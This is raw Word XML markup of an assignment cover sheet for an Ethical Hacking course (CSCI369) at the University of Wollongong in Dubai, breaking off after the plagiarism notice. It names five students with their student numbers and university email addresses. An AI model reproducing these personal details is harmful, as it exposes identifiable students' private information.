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1243C" w14:textId="77777777" w:rsidR="00D03104" w:rsidRDefault="00D03104" w:rsidP="00D03104">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:noProof/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F0524CD" wp14:editId="23617FBA">
            <wp:extent cx="2133600" cy="695325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="image3.png" descr="https://my.uowdubai.ac.ae/images/printlogo.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image3.png" descr="https://my.uowdubai.ac.ae/images/printlogo.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2133600" cy="695325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:color w:val="0099CC"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Assignment Cover Sheet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:color w:val="0099CC"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0400" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2816"/>
        <w:gridCol w:w="6544"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D03104" w14:paraId="093D14F8" w14:textId="77777777" w:rsidTr="00556FA6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2816" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04080381"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Subject Code:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6544" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="427B24BC" w14:textId="15F26FF6" w:rsidR="00D03104" w:rsidRDefault="00D03104" w:rsidP="00556FA6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>CS</w:t>
            </w:r>
            <w:r w:rsidR="00FA79DE">
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>CI369</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D03104" w14:paraId="0C11784C" w14:textId="77777777" w:rsidTr="00556FA6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2816" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="075A2B50"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Subject Name:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6544" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="293C5EE6" w14:textId="02E77C84" w:rsidR="00D03104" w:rsidRDefault="00FA79DE" w:rsidP="00556FA6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>Ethical Hacking</w:t>
            </w:r>
            <w:r w:rsidR="00EE1BB6">
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D03104" w14:paraId="039E3B03" w14:textId="77777777" w:rsidTr="00556FA6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2816" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1540ADD0"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Submission Type:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6544" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D58D2DC" w14:textId="77777777" w:rsidR="00D03104" w:rsidRDefault="00D03104" w:rsidP="00556FA6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>Report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D03104" w14:paraId="52FBC2F6" w14:textId="77777777" w:rsidTr="00556FA6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2816" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="684A8395"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Assignment Title:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6544" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DA6CC64" w14:textId="20C132F4" w:rsidR="00D03104" w:rsidRDefault="00EE388B" w:rsidP="00556FA6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>Assessment 3: Assignment Cum Project</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D03104" w14:paraId="49EE2EB2" w14:textId="77777777" w:rsidTr="00556FA6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2816" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F733EC5"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Student Name:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6544" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="233BD885" w14:textId="21E5679A" w:rsidR="00D03104" w:rsidRDefault="00EE388B" w:rsidP="00556FA6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>Raheel Ahmed</w:t>
            </w:r>
            <w:r w:rsidR="00B867CA">
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, Ahan Sunil, Hriday Pradeep, Kishan </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00B867CA">
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>Dhanak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00B867CA">
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>, Sibi Varghese</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D03104" w14:paraId="271CE82A" w14:textId="77777777" w:rsidTr="00556FA6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2816" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51824E56"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Student Number:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6544" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F0413C2" w14:textId="77777777" w:rsidR="00D03104" w:rsidRDefault="00D03104" w:rsidP="00556FA6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2842C261" w14:textId="52997E06" w:rsidR="00D03104" w:rsidRDefault="00EE388B" w:rsidP="00556FA6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>8971134</w:t>
            </w:r>
            <w:r w:rsidR="001872C6">
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>, 8398112, 8890766, 9072974, 8935166</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2427D4D6" w14:textId="77777777" w:rsidR="00D03104" w:rsidRDefault="00D03104" w:rsidP="00556FA6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D03104" w14:paraId="62364D6F" w14:textId="77777777" w:rsidTr="00556FA6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2816" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B03659B" w14:textId="77777777" w:rsidR="00D03104" w:rsidRDefault="00D03104" w:rsidP="00556FA6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
                <w:b/>
                <w:color w:val="000099"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6544" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C5DB6AF" w14:textId="77777777" w:rsidR="00D03104" w:rsidRDefault="00D03104" w:rsidP="00556FA6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D03104" w14:paraId="20FB4085" w14:textId="77777777" w:rsidTr="00556FA6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2816" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="584590E3"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Student Email:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6544" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09F89866" w14:textId="3AAFBBEB" w:rsidR="00D03104" w:rsidRDefault="00EE388B" w:rsidP="00D03104">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:color w:val="0000FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId9" w:history="1">
              <w:r w:rsidRPr="00730A77">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>rmas840@uowmail.edu.au</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="001872C6">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:hyperlink r:id="rId10" w:history="1">
              <w:r w:rsidR="001872C6" w:rsidRPr="000F2E5F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>as8997@uowmail.edu.au</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="001872C6">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:hyperlink r:id="rId11" w:history="1">
              <w:r w:rsidR="00B867CA" w:rsidRPr="000F2E5F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>hpk687@uowmail.edu.au</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00B867CA">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:hyperlink r:id="rId12" w:history="1">
              <w:r w:rsidR="00B867CA" w:rsidRPr="000F2E5F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>krd341@uowmail.edu.au</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00B867CA">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:hyperlink r:id="rId13" w:history="1">
              <w:r w:rsidR="00B867CA" w:rsidRPr="000F2E5F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>svp967@uowmail.edu.au</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00B867CA">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D03104" w14:paraId="77E9A2B2" w14:textId="77777777" w:rsidTr="00556FA6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2816" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61E70262"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Lecturer Name:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6544" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76536228" w14:textId="035D49B2" w:rsidR="00D03104" w:rsidRDefault="00E54CC4" w:rsidP="00556FA6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E54CC4">
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>Dr. Mouhannad A</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>lattar</w:t>
            </w:r>
            <w:r w:rsidRPr="00E54CC4">
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D03104" w14:paraId="16ACA21D" w14:textId="77777777" w:rsidTr="00556FA6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2816" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="591384C4"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Due Date:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6544" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5CD94804" w14:textId="34E687B1" w:rsidR="00D03104" w:rsidRDefault="002037A9" w:rsidP="00556FA6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidRPr="002037A9">
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>th</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> June</w:t>
            </w:r>
            <w:r w:rsidR="00EE1BB6">
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>, 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D03104" w14:paraId="4FD05E84" w14:textId="77777777" w:rsidTr="00556FA6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2816" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77D3F225"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Date Submitted:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6544" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18FD7DD0" w14:textId="068DF7E0" w:rsidR="00D03104" w:rsidRDefault="002037A9" w:rsidP="00556FA6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidRPr="002037A9">
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>th</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> June, 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="07C6D283" w14:textId="77777777" w:rsidR="00D03104" w:rsidRDefault="00D03104" w:rsidP="00D03104">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9344" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0400" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4672"/>
        <w:gridCol w:w="4672"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D03104" w14:paraId="53355F8F" w14:textId="77777777" w:rsidTr="00556FA6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4672" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="718695EC" w14:textId="77777777" w:rsidR="00D03104" w:rsidRDefault="00D03104" w:rsidP="00556FA6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:b/>
                <w:color w:val="990000"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>PLAGIARISM: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:b/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>The penalty for deliberate plagiarism is FAILURE in the subject. Plagiarism is cheating by using the written ideas or submitted work of someone else. UOWD has a strong policy against plagiarism. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:br/>
              <w:t>The University of Wollongong in Dubai also endorses a policy of non-discriminatory language practice and presentation.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="533270A0" w14:textId="77777777" w:rsidR="00D03104" w:rsidRDefault="00D03104" w:rsidP="00556FA6">
            <w:pPr>
              <w:spacing w:before="280" w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
